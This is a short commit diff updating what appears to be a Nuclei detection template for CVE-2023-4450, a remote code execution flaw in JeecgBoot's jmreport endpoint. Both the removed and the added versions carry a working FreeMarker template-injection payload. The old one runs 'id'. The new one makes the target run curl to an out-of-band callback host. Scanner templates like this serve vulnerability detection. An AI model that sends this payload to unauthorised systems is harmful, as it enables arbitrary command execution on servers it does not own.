minor update

http/cves/2023/CVE-2023-4450.yaml

@@ -30,29 +30,22 @@ info:
   tags: cve,cve2023,rce,jeecgboot
 
 http:
-  - method: POST
-    path:
-      - "{{BaseURL}}/jmreport/queryFieldBySql"
-    headers:
-      Content-Type: application/json
+  - raw:
+      - |
+        POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
 
-    body: |
-      {
-        "sql": "select 'result:<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ex(\"id\")}'"
-      }
+        {
+          "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://{{interactsh-url}}\")} ",
+          "type": "0"
+        }
 
-    matchers-condition: and
     matchers:
-      - type: regex
-        part: body
-        regex:
-          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)"
-
-      - type: word
-        part: content_type
-        words:
-          - "application/json"
-
-      - type: status
-        status:
-          - 200
+      - type: dsl
+        dsl:
+          - 'contains(interactsh_protocol, "http") || contains(interactsh_protocol, "dns")'
+          - 'status_code == 200'
+          - 'contains(content_type,"application/json")'
+          - 'contains(body,"success")'
+        condition: and